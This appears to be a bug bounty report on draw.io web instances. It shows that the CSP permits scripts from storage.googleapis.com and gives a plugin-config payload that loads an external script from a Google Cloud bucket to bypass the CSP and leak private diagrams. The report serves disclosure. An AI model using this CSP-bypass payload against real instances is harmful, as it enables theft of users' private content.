📝 Description

Drawio WEB instancesn allows https://storage.googleapis.com in CSP script-src, abusing the XSS found in this report, it is possible to bypass the CSP and leak private diagram content.

🕵️‍♂️ Proof of Concept

On the web application side, the javascript execution is protected by the following CSP:

...
script-src https://www.dropbox.com https://api.trello.com 'self' https://viewer.diagrams.net https://storage.googleapis.com https://apis.google.com https://*.pusher.com 'sha256-AVuOIxynOo/05KDLjyp0AoBE+Gt/KE1/vh2pS+yfqes=' 'sha256-r/ILW7KMSJxeo9EYqCTzZyCT0PZ9gHN1BLgki7vpR+A=' 'sha256-5DtSB5mj34lxcEf+HFWbBLEF49xxJaKnWGDWa/utwQA=' 'sha256-vS/MxlVD7nbY7AnV+0t1Ap338uF7vrcs7y23KjERhKc='
...

Because it allows you to load script from https://storage.googleapis.com which is the public URL for Google Cloud Bucket, it is possible to use it to execute our code.

{
  "plugins": [
    "https://storage.googleapis.com/bypass_csp/xss.js"
  ]
}